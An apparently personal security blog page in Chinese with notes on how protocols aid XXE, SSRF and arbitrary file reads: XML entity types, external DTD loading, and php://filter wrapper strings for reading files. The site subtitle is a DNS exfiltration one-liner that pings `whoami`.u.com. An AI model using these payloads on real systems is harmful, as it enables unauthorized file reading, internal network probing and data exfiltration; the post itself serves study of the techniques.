<!DOCTYPE html>



  


<html class="theme-next muse use-motion" lang="en">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css" />







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css" />


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="Hexo, NexT" />




  


  <link rel="alternate" href="/atom.xml" title="Breezy's Blog" type="application/atom+xml" />






<meta name="description" content="最近遇到的很多利用，无论是XXE、SSRF还是类似文件包含的任意文件读取，在实际利用过程中，无不和协议扯上关系。在debug过程中也遇到很多以前没注意的问题，特此记录一下。 XXEXXE一般是解析XML的时候调用了外部实体，通过外部实体读取内容回显出来或者通过向外的请求将数据带外。实体简单来说就是某种变量，通过dtd(文档类型定义)的定义去引用(dtd也能够定义element去规定整个xml标签的">
<meta property="og:type" content="article">
<meta property="og:title" content="协议tips">
<meta property="og:url" content="http://a1ne.github.io/2020/04/02/%E5%8D%8F%E8%AE%AEtips/index.html">
<meta property="og:site_name" content="Breezy&#39;s Blog">
<meta property="og:description" content="最近遇到的很多利用，无论是XXE、SSRF还是类似文件包含的任意文件读取，在实际利用过程中，无不和协议扯上关系。在debug过程中也遇到很多以前没注意的问题，特此记录一下。 XXEXXE一般是解析XML的时候调用了外部实体，通过外部实体读取内容回显出来或者通过向外的请求将数据带外。实体简单来说就是某种变量，通过dtd(文档类型定义)的定义去引用(dtd也能够定义element去规定整个xml标签的">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="http://a1ne.github.io/images/Protocol/xxe_pro.png">
<meta property="og:image" content="http://a1ne.github.io/images/protocol/extension.png">
<meta property="article:published_time" content="2020-04-03T00:35:31.000Z">
<meta property="article:modified_time" content="2020-04-03T01:34:43.163Z">
<meta property="article:author" content="Breezy">
<meta property="article:tag" content="RedTeam">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://a1ne.github.io/images/Protocol/xxe_pro.png">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Muse',
    version: '5.1.4',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: 'Author'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://a1ne.github.io/2020/04/02/协议tips/"/>





  <title>协议tips | Breezy's Blog</title>
  








<meta name="generator" content="Hexo 4.2.0"></head>

<body itemscope itemtype="http://schema.org/WebPage" lang="en">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/"  class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">Breezy's Blog</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle">$> ping -c 1 `whoami`.u.com</p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/%20" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br />
            
            Home
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/%20" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br />
            
            Archives
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://a1ne.github.io/2020/04/02/%E5%8D%8F%E8%AE%AEtips/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="Breezy">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/images/avatar.gif">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Breezy's Blog">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">协议tips</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">Posted on</span>
              
              <time title="Post created" itemprop="dateCreated datePublished" datetime="2020-04-02T17:35:31-07:00">
                2020-04-02
              </time>
            

            

            
          </span>

          

          
            
          

          
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <p>最近遇到的很多利用，无论是XXE、SSRF还是类似文件包含的任意文件读取，在实际利用过程中，无不和协议扯上关系。在debug过程中也遇到很多以前没注意的问题，特此记录一下。</p>
<h2 id="XXE"><a href="#XXE" class="headerlink" title="XXE"></a>XXE</h2><p>XXE一般是解析XML的时候调用了外部实体，通过外部实体读取内容回显出来或者通过向外的请求将数据带外。<br>实体简单来说就是某种变量，通过dtd(文档类型定义)的定义去引用(dtd也能够定义element去规定整个xml标签的结构)</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">&lt;?xml version&#x3D;&quot;1.0&quot;?&gt;</span><br><span class="line">&lt;!DOCTYPE r[                  &#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&gt; dtd</span><br><span class="line">&lt;!ELEMENT r ANY &gt;               &#x2F;&#x2F;接受任意元素</span><br><span class="line">&lt;!ENTITY s &quot;test&quot;&gt;              &#x2F;&#x2F;实体</span><br><span class="line">]&gt;</span><br><span class="line">&lt;username&gt;&amp;s;&lt;username&#x2F;&gt;</span><br></pre></td></tr></table></figure>
<p>上述的请求在解析过程中会将<code>username</code>字段的值替换成上面定义的<code>test</code><br>实体分为内部和外部，外部实体用于是引用外部的内容</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">&lt;!ENTITY s &quot;test&quot;&gt;       内部实体</span><br><span class="line">&lt;!ENTITY s SYSTEM &quot;file:&#x2F;&#x2F;&#x2F;var&#x2F;www&#x2F;test.dtd&quot;&gt;   外部实体</span><br><span class="line"></span><br><span class="line">除了上述 外部实体的引入还可以使用公用dtd</span><br><span class="line">&lt;!DOCTYPE 根元素名称 PUBLIC “DTD标识名” “公用DTD的URI”&gt;</span><br></pre></td></tr></table></figure>
<p>除了外部和内部的区别，实体还分为通用实体和参数实体</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">通用实体</span><br><span class="line">通过&amp;xxx;引用的实体,DTD 中定义后在XML中引用</span><br><span class="line">&lt;!DOCTYPE r[&lt;!ENTITY s SYSTEM &quot;http:&#x2F;&#x2F;example.com&#x2F;public.dtd&quot;&gt;]&gt;</span><br><span class="line">&lt;username&gt;&amp;s;&lt;&#x2F;username&gt;</span><br><span class="line"></span><br><span class="line">参数实体</span><br><span class="line">通过%xxx;引用，只能在DTD中定义和使用，只有在外部dtd中参数实体定义才能引用其他实体</span><br><span class="line">&lt;!DOCTYPE r[</span><br><span class="line">&lt;!ENTITY % s SYSTEM &quot;http:&#x2F;&#x2F;example.com&#x2F;public.dtd&quot;&gt;</span><br><span class="line">%s;   -----&gt;引入外部dtd文件内容</span><br><span class="line">]&gt;</span><br></pre></td></tr></table></figure>
<p>通过外部实体的引入可以使得不用频繁更新当前xml结构，但是引入的时候没有做限制，就可能导致结合协议的任意文件读取或ssrf。<br>最简单的场景就是一个登陆框，用xml形式传递用户名和密码。在请求后会将用户名回显出来<br>这时候就能够利用通用外部实体调用file协议读取敏感文件，然后通过响应的回显将文件内容显示出来，其他的协议类似，http、gopher、dict等协议可以实现进一步内网探测和攻击。<br>协议的支持偷一张小圆圆师傅(k0rz3n)的图</p>
<p><img src="/images/Protocol/xxe_pro.png" alt="upload successful"><br>读文件时候文件特殊字符问题可以对应根据协议去绕过，最舒服的就是php伪协议，其他的java对应的jar协议能够实现文件的上传,或者phar协议RCE，但高版本的jdk移除了对gopher协议的支持，并且带外url中不支持<code>\n</code>，http协议和ftp协议(大部分版本)只能读取一行.</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">php:&#x2F;&#x2F;filter&#x2F;read&#x3D;convert.base64-encode&#x2F;resource&#x3D;</span><br><span class="line">php:&#x2F;&#x2F;filter&#x2F;write&#x3D;convert.base64-encode&#x2F;resource&#x3D;</span><br><span class="line">php:&#x2F;&#x2F;filter&#x2F;read&#x3D;string.rot13&#x2F;resource&#x3D;</span><br><span class="line">php:&#x2F;&#x2F;filter&#x2F;read&#x3D;string.strip_tags&#x2F;resource&#x3D; 去除特殊标签&lt;?php exit();?&gt;特别好使</span><br><span class="line">里面的协议支持管道string.strip_tags|convert.base64-encode</span><br></pre></td></tr></table></figure>
<p>php在安装扩展后还支持如下协议(同样盗图)</p>
<p><img src="/images/protocol/extension.png" alt="extension"></p>
<h2 id="参考"><a href="#参考" class="headerlink" title="参考"></a>参考</h2><blockquote>
<p><a href="https://www.leavesongs.com/PENETRATION/php-filter-magic.html" target="_blank" rel="noopener">谈一谈php://filter的妙用</a><br><a href="https://www.leadroyal.cn/?p=914" target="_blank" rel="noopener">9102年Java里的XXE</a></p>
</blockquote>

      
    </div>
    
    
    

    

    

    

    <footer class="post-footer">
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2020/03/31/Mysql%E4%BB%BB%E6%84%8F%E8%AF%BB%E5%8F%96%E5%AE%A2%E6%88%B7%E7%AB%AF%E6%96%87%E4%BB%B6/" rel="next" title="Mysql任意读取客户端文件">
                <i class="fa fa-chevron-left"></i> Mysql任意读取客户端文件
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            Table of Contents
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            Overview
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <p class="site-author-name" itemprop="name">Breezy</p>
              <p class="site-description motion-element" itemprop="description"></p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/%20%7C%7C%20archive">
              
                  <span class="site-state-item-count">3</span>
                  <span class="site-state-item-name">posts</span>
                </a>
              </div>
            

            

            

          </nav>

          
            <div class="feed-link motion-element">
              <a href="/atom.xml" rel="alternate">
                <i class="fa fa-rss"></i>
                RSS
              </a>
            </div>
          

          

          
          

          
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#XXE"><span class="nav-number">1.</span> <span class="nav-text">XXE</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#参考"><span class="nav-number">2.</span> <span class="nav-text">参考</span></a></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2020</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Breezy</span>

  
</div>


  <div class="powered-by">Powered by <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a></div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">Theme &mdash; <a class="theme-link" target="_blank" href="https://github.com/iissnan/hexo-theme-next">NexT.Muse</a> v5.1.4</div>




        







        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  












  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  

  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  












  





  

  

  

  
  

  

  

  

</body>
</html>
